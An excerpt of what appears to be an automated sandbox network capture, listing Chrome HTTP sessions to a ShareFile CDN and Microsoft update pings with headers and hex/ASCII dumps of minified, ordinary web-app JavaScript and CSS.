                                                                                                                                                                                                                      Data Ascii: es.length-1;n>=0;--n){var r=this.tryEntries[n];if(r.tryLoc<=this.prev&&a.call(r,"finallyLoc")&&this.prev<r.finallyLoc){var o=r;break}}o&&("break"===e||"continue"===e)&&o.tryLoc<=t&&t<=o.finallyLoc&&(o=null);var i=o?o.completion:{};return i.type=e,i.arg=t,
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC16384INData Raw: 24 2e 66 6f 72 45 61 63 68 28 74 68 69 73 2e 68 61 6e 64 6c 65 72 73 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 75 6c 6c 21 3d 3d 74 26 26 65 28 74 29 7d 29 29 7d 7d 2c 64 65 3d 7b 73 69 6c 65 6e 74 4a 53 4f 4e 50 61 72 73 69 6e 67 3a 21 30 2c 66 6f 72 63 65 64 4a 53 4f 4e 50 61 72 73 69 6e 67 3a 21 30 2c 63 6c 61 72 69 66 79 54 69 6d 65 6f 75 74 45 72 72 6f 72 3a 21 31 7d 2c 70 65 3d 7b 69 73 42 72 6f 77 73 65 72 3a 21 30 2c 63 6c 61 73 73 65 73 3a 7b 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3f 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3a 75 65 2c 46 6f 72 6d 44 61 74 61 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 46 6f
                                                                                                                                                                                                                      Data Ascii: $.forEach(this.handlers,(function(t){null!==t&&e(t)}))}},de={silentJSONParsing:!0,forcedJSONParsing:!0,clarifyTimeoutError:!1},pe={isBrowser:!0,classes:{URLSearchParams:"undefined"!=typeof URLSearchParams?URLSearchParams:ue,FormData:"undefined"!=typeof Fo
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC16384INData Raw: 77 61 69 74 20 69 74 28 6c 2c 72 29 29 29 7b 6c 65 74 20 65 2c 6e 3d 6e 65 77 20 52 65 71 75 65 73 74 28 74 2c 7b 6d 65 74 68 6f 64 3a 22 50 4f 53 54 22 2c 62 6f 64 79 3a 72 2c 64 75 70 6c 65 78 3a 22 68 61 6c 66 22 7d 29 3b 69 66 28 24 2e 69 73 46 6f 72 6d 44 61 74 61 28 72 29 26 26 28 65 3d 6e 2e 68 65 61 64 65 72 73 2e 67 65 74 28 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 29 29 26 26 6c 2e 73 65 74 43 6f 6e 74 65 6e 74 54 79 70 65 28 65 29 2c 6e 2e 62 6f 64 79 29 7b 63 6f 6e 73 74 5b 65 2c 74 5d 3d 55 65 28 76 2c 49 65 28 42 65 28 75 29 29 29 3b 72 3d 24 65 28 6e 2e 62 6f 64 79 2c 36 35 35 33 36 2c 65 2c 74 2c 58 65 29 7d 7d 24 2e 69 73 53 74 72 69 6e 67 28 66 29 7c 7c 28 66 3d 66 3f 22 69 6e 63 6c 75 64 65 22 3a 22 6f 6d 69 74 22 29 2c 68 3d 6e 65 77
                                                                                                                                                                                                                      Data Ascii: wait it(l,r))){let e,n=new Request(t,{method:"POST",body:r,duplex:"half"});if($.isFormData(r)&&(e=n.headers.get("content-type"))&&l.setContentType(e),n.body){const[e,t]=Ue(v,Ie(Be(u)));r=$e(n.body,65536,e,t,Xe)}}$.isString(f)||(f=f?"include":"omit"),h=new
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC950INData Raw: 6d 73 3b 72 65 74 75 72 6e 20 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 70 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 70 69 6c 65 74 41 70 69 3a 74 7d 2c 72 29 29 7d 29 29 2c 74 2e 72 65 67 69 73 74 65 72 45 78 74 65 6e 73 69 6f 6e 28 77 2e 59 43 2e 52 65 63 65 6e 74 6c 79 44 65 6c 65 74 65 64 54 61 62 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 6e 2e 70 61 72 61 6d 73 3b 72 65 74 75 72 6e 20 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 79 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 70 69 6c 65 74 41 70 69 3a 74 7d 2c 72 29 29 7d 29 29 2c 74 2e 72 65 67 69 73 74 65 72 45 78 74 65 6e 73 69 6f 6e 28 77 2e 59 43 2e 46 69 6c 65 73 54 61 62 6c 65 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 6e 2e 70 61 72 61 6d
                                                                                                                                                                                                                      Data Ascii: ms;return e.createElement(p,Object.assign({piletApi:t},r))})),t.registerExtension(w.YC.RecentlyDeletedTab,(function(n){var r=n.params;return e.createElement(y,Object.assign({piletApi:t},r))})),t.registerExtension(w.YC.FilesTable,(function(n){var r=n.param


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      124192.168.2.174984413.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC579OUTGET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC509INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 1492
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Mon, 04 Nov 2024 07:10:45 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 08:24:46 GMT
                                                                                                                                                                                                                      ETag: "f17cade455c1e9df4641950a02b898ec"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 4e4c50c641418e6aad9ec09cb0f22844.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: Bl-yYEYt9LQC3GmkvJiMy-6D8HStEn75LhV8nw4_vg8icWIKW0fNuQ==
                                                                                                                                                                                                                      Age: 40297
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC1492INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 7b 61 73 63 65 6e 74 2d 6f 76 65 72 72 69 64 65 3a 39 35 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 50 50 4d 6f 72 69 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 73 72 63 3a 75 72 6c 28 34 30 32 62 37 34 30 35 33 64 32 36 33 32 33 35 39 36 62 33 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 75 72 6c 28 38 32 32 32 34 39 66 64 31 39 38 30 63 32 63 66 37 36 64 38 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 61 73 63 65 6e 74 2d 6f 76 65 72 72 69 64 65 3a 39 35 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 50 50 4d 6f 72 69 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 66 6f 6e 74 2d
                                                                                                                                                                                                                      Data Ascii: @font-face{ascent-override:95%;font-family:PPMori;font-style:normal;font-weight:300;src:url(402b74053d26323596b3.woff2) format("woff2"),url(822249fd1980c2cf76d8.woff) format("woff")}@font-face{ascent-override:95%;font-family:PPMori;font-style:italic;font-


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      125192.168.2.174984513.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC425OUTGET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC526INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 133363
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Mon, 04 Nov 2024 07:10:45 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 08:24:41 GMT
                                                                                                                                                                                                                      ETag: "13dc49e47065015d15ef3bafe1f88202"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 f797fc0ae68a3abc35e081e46174c9f2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: 3It3U_if2JfmLz-rnlb96LtNu7Tu_cy89tG8VtxcavU_2vaoxXEbRw==
                                                                                                                                                                                                                      Age: 40303
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC15858INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 64 79 6e 61 6d 69 63 66 6f 72 6d 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevdynamicformspilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={},a={},s={},c={};return Object.defineP
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC16384INData Raw: 2c 69 3d 28 72 28 37 35 36 34 29 2c 72 28 31 32 38 37 29 2c 21 31 29 2c 61 3d 6e 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 3f 28 30 2c 6f 2e 41 29 28 7b 6b 65 79 3a 22 63 73 73 22 7d 29 3a 6e 75 6c 6c 29 2c 73 3d 28 61 2e 50 72 6f 76 69 64 65 72 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 6e 2e 66 6f 72 77 61 72 64 52 65 66 29 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 6f 3d 28 30 2c 6e 2e 75 73 65 43 6f 6e 74 65 78 74 29 28 61 29 3b 72 65 74 75 72 6e 20 65 28 74 2c 6f 2c 72 29 7d 29 29 7d 29 2c 63 3d 6e 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 7b 7d 29 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e
                                                                                                                                                                                                                      Data Ascii: ,i=(r(7564),r(1287),!1),a=n.createContext("undefined"!=typeof HTMLElement?(0,o.A)({key:"css"}):null),s=(a.Provider,function(e){return(0,n.forwardRef)((function(t,r){var o=(0,n.useContext)(a);return e(t,o,r)}))}),c=n.createContext({}),u=function(){return n
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC16384INData Raw: 65 6e 74 2d 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 7d 29 2c 72 3d 79 69 65 6c 64 20 62 28 74 2c 7b 65 78 70 65 63 74 65 64 53 74 61 74 75 73 3a 32 30 31 2c 64 65 66 61 75 6c 74 45 72 72 6f 72 4d 65 73 73 61 67 65 3a 22 55 6e 61 62 6c 65 20 74 6f 20 63 72 65 61 74 65 20 70 72 6f 6a 65 63 74 22 7d 29 3b 72 65 74 75 72 6e 20 79 69 65 6c 64 20 72 2e 6a 73 6f 6e 28 29 7d 29 29 7d 2c 67 65 74 53 6f 72 74 65 64 50 72 6f 6a 65 63 74 73 57 69 74 68 45 6e 74 69 74 6c 65 6d 65 6e 74 73 28 65 2c 74 2c 72 2c 6f 2c 69 29 7b 72 65 74 75 72 6e 28 30 2c 6e 2e 5f 5f 61 77 61 69 74 65 72 29 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 55 52 4c 53 65
                                                                                                                                                                                                                      Data Ascii: ent-type":"application/json"}}),r=yield b(t,{expectedStatus:201,defaultErrorMessage:"Unable to create project"});return yield r.json()}))},getSortedProjectsWithEntitlements(e,t,r,o,i){return(0,n.__awaiter)(this,void 0,void 0,(function*(){const n=new URLSe
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC15777INData Raw: 6e 75 6c 6c 21 3d 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 7c 7c 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 20 69 6e 20 65 7c 7c 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 20 69 6e 20 65 29 7d 2c 6b 3d 70 28 22 44 61 74 65 22 29 2c 6a 3d 70 28 22 46 69 6c 65 22 29 2c 4f 3d 70 28 22 42 6c 6f 62 22 29 2c 5f 3d 70 28 22 46 69 6c 65 4c 69 73 74 22 29 2c 52 3d 70 28 22 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 22 29 2c 5b 41 2c 54 2c 46 2c 43 5d 3d 5b 22 52 65 61 64 61 62 6c 65 53 74 72 65 61 6d 22 2c 22 52 65 71 75 65 73 74 22 2c 22 52 65 73 70 6f 6e 73 65 22 2c 22 48 65 61 64 65 72 73 22 5d 2e 6d 61 70 28 70 29 3b 66 75 6e 63 74 69 6f 6e 20 50 28 65 2c 74 2c 7b 61 6c 6c 4f 77 6e 4b 65 79 73 3a 72 3d 21 31 7d
                                                                                                                                                                                                                      Data Ascii: null!==Object.getPrototypeOf(t)||Symbol.toStringTag in e||Symbol.iterator in e)},k=p("Date"),j=p("File"),O=p("Blob"),_=p("FileList"),R=p("URLSearchParams"),[A,T,F,C]=["ReadableStream","Request","Response","Headers"].map(p);function P(e,t,{allOwnKeys:r=!1}
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC16384INData Raw: 67 75 72 61 62 6c 65 3a 21 30 7d 29 7d 29 29 7d 28 72 2c 65 29 2c 74 5b 6e 5d 3d 21 30 29 7d 72 65 74 75 72 6e 20 51 2e 69 73 41 72 72 61 79 28 65 29 3f 65 2e 66 6f 72 45 61 63 68 28 6e 29 3a 6e 28 65 29 2c 74 68 69 73 7d 7d 43 65 2e 61 63 63 65 73 73 6f 72 28 5b 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 2c 22 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 22 2c 22 41 63 63 65 70 74 22 2c 22 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 22 2c 22 55 73 65 72 2d 41 67 65 6e 74 22 2c 22 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 22 5d 29 2c 51 2e 72 65 64 75 63 65 44 65 73 63 72 69 70 74 6f 72 73 28 43 65 2e 70 72 6f 74 6f 74 79 70 65 2c 28 28 7b 76 61 6c 75 65 3a 65 7d 2c 74 29 3d 3e 7b 6c 65 74 20 72 3d 74 5b 30 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 74 2e
                                                                                                                                                                                                                      Data Ascii: gurable:!0})}))}(r,e),t[n]=!0)}return Q.isArray(e)?e.forEach(n):n(e),this}}Ce.accessor(["Content-Type","Content-Length","Accept","Accept-Encoding","User-Agent","Authorization"]),Q.reduceDescriptors(Ce.prototype,(({value:e},t)=>{let r=t[0].toUpperCase()+t.
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC16384INData Raw: 73 2e 73 75 62 73 63 72 69 62 65 28 74 29 2c 65 2e 73 69 67 6e 61 6c 2e 75 6e 73 75 62 73 63 72 69 62 65 3d 28 29 3d 3e 74 68 69 73 2e 75 6e 73 75 62 73 63 72 69 62 65 28 74 29 2c 65 2e 73 69 67 6e 61 6c 7d 73 74 61 74 69 63 20 73 6f 75 72 63 65 28 29 7b 6c 65 74 20 65 3b 72 65 74 75 72 6e 7b 74 6f 6b 65 6e 3a 6e 65 77 20 53 74 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 3d 74 7d 29 29 2c 63 61 6e 63 65 6c 3a 65 7d 7d 7d 63 6f 6e 73 74 20 6b 74 3d 53 74 3b 63 6f 6e 73 74 20 6a 74 3d 7b 43 6f 6e 74 69 6e 75 65 3a 31 30 30 2c 53 77 69 74 63 68 69 6e 67 50 72 6f 74 6f 63 6f 6c 73 3a 31 30 31 2c 50 72 6f 63 65 73 73 69 6e 67 3a 31 30 32 2c 45 61 72 6c 79 48 69 6e 74 73 3a 31 30 33 2c 4f 6b 3a 32 30 30 2c 43 72 65 61 74 65 64 3a 32 30 31 2c 41 63 63 65 70 74
                                                                                                                                                                                                                      Data Ascii: s.subscribe(t),e.signal.unsubscribe=()=>this.unsubscribe(t),e.signal}static source(){let e;return{token:new St((function(t){e=t})),cancel:e}}}const kt=St;const jt={Continue:100,SwitchingProtocols:101,Processing:102,EarlyHints:103,Ok:200,Created:201,Accept
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC16384INData Raw: 65 74 75 72 6e 20 54 74 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 72 2e 70 72 65 76 3d 72 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 72 2e 70 72 65 76 3d 30 2c 6e 3d 74 3f 7b 63 6c 6f 73 75 72 65 4d 65 73 73 61 67 65 3a 74 7d 3a 7b 7d 2c 72 2e 6e 65 78 74 3d 34 2c 52 74 2e 70 75 74 28 22 2f 22 2e 63 6f 6e 63 61 74 28 73 2e 78 57 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 63 6c 6f 73 65 22 29 2c 6e 29 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 6f 3d 72 2e 73 65 6e 74 2c 72 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 6f 29 3b 63 61 73 65 20 38 3a 74 68 72 6f 77 20 72 2e 70 72 65 76 3d 38 2c 72 2e 74 30 3d 72 5b 22 63 61 74 63 68 22 5d 28 30 29 2c 6e 65 77 20
                                                                                                                                                                                                                      Data Ascii: eturn Tt().wrap((function(r){for(;;)switch(r.prev=r.next){case 0:return r.prev=0,n=t?{closureMessage:t}:{},r.next=4,Rt.put("/".concat(s.xW,"/").concat(e,"/close"),n);case 4:return o=r.sent,r.abrupt("return",o);case 8:throw r.prev=8,r.t0=r["catch"](0),new
                                                                                                                                                                                                                      2024-11-05 19:36:24 UTC16384INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 72 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 6e 7d 29 7d 2c 32 39 30 31 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 6e 3d 72 28 38 31 36 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6f 3d 74 5b 72 5d 3b 6f 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 6f 2e 65 6e
                                                                                                                                                                                                                      Data Ascii: "use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}r.d(t,{A:()=>n})},2901:(e,t,r)=>{"use strict";r.d(t,{A:()=>i});var n=r(816);function o(e,t){for(var r=0;r<t.length;r++){var o=t[r];o.enumerable=o.en
                                                                                                                                                                                                                      2024-11-05 19:36:24 UTC3424INData Raw: 6d 69 73 65 2e 61 6c 6c 28 5b 66 2e 65 28 31 38 38 29 2c 66 2e 65 28 32 33 37 29 2c 66 2e 65 28 38 31 38 29 2c 66 2e 65 28 34 38 38 29 2c 66 2e 65 28 32 38 32 29 2c 66 2e 65 28 38 34 32 29 2c 66 2e 65 28 32 37 29 5d 29 2e 74 68 65 6e 28 66 2e 62 69 6e 64 28 66 2c 32 37 29 29 7d 29 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 74 2e 6a 73 78 29 28 6f 5b 22 64 65 66 61 75 6c 74 22 5d 2e 53 75 73 70 65 6e 73 65 2c 7b 66 61 6c 6c 62 61 63 6b 3a 28 30 2c 74 2e 6a 73 78 29 28 6e 2e 53 6b 65 6c 65 74 6f 6e 2c 7b 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 74 2e 6a 73 78 29 28 50 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 65 29 29 7d 29 7d 2c 49 3d 6f 5b 22 64 65 66 61 75 6c 74 22 5d 2e 6c 61 7a 79 28 28 66 75 6e 63 74 69
                                                                                                                                                                                                                      Data Ascii: mise.all([f.e(188),f.e(237),f.e(818),f.e(488),f.e(282),f.e(842),f.e(27)]).then(f.bind(f,27))})),B=function(e){return(0,t.jsx)(o["default"].Suspense,{fallback:(0,t.jsx)(n.Skeleton,{}),children:(0,t.jsx)(P,Object.assign({},e))})},I=o["default"].lazy((functi


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      126192.168.2.175359320.242.39.171443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:25 UTC142OUTGET /clientwebservice/ping HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      User-Agent: DNS resiliency checker/1.0
                                                                                                                                                                                                                      Host: fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                      2024-11-05 19:36:25 UTC234INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:24 GMT
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Length: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      127192.168.2.175359420.12.23.50443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:26 UTC124OUTGET /sls/ping HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      User-Agent: DNS resiliency checker/1.0
                                                                                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                                                                                      2024-11-05 19:36:26 UTC318INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                      MS-CV: ZE6taRVL1UmIZ8Y+.0
                                                                                                                                                                                                                      MS-RequestId: 7a2c857c-5005-4315-9ef1-9e98c8141290
                                                                                                                                                                                                                      MS-CorrelationId: dd03f96f-295b-4c95-baf3-6e7a632d005e
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:25 GMT
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Length: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      128192.168.2.175359513.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:26 UTC439OUTGET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/citrite-citrix-ui.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:26 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 795817
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Mar 2024 06:32:15 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:26 GMT
                                                                                                                                                                                                                      ETag: "1ef237d0b6617d5d9e82d98839b65753"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 eb83e7e264681d87a86c9b6a2159e502.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
